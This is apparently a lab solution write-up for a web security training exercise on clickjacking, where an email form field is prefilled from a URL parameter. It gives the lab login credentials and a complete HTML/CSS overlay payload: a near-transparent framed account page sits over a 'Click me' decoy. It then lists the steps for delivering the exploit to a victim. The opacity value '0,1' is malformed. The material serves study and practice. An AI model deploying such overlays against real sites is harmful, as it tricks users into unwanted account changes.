Clickjacking with form input data prefilled from a

Clickjacking with form input data prefilled from a URL parameter

Solution

Login as user: wiener

L: wiener
P: peter

Prepare payload

<style>
    iframe {
        position:relative;
        width:1000px;
        height: 700px;
        opacity: 0,1;
        z-index: 2;
    }
    div {
        position:absolute;
        top:400px;
        left:80px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0af3008f0416355380ba58c2003e00de.web-security-academy.net/[email protected]"></iframe>

Delivery exploit to victim

Click "Store" --> "View exploit" --> "Delivery exploit to victim"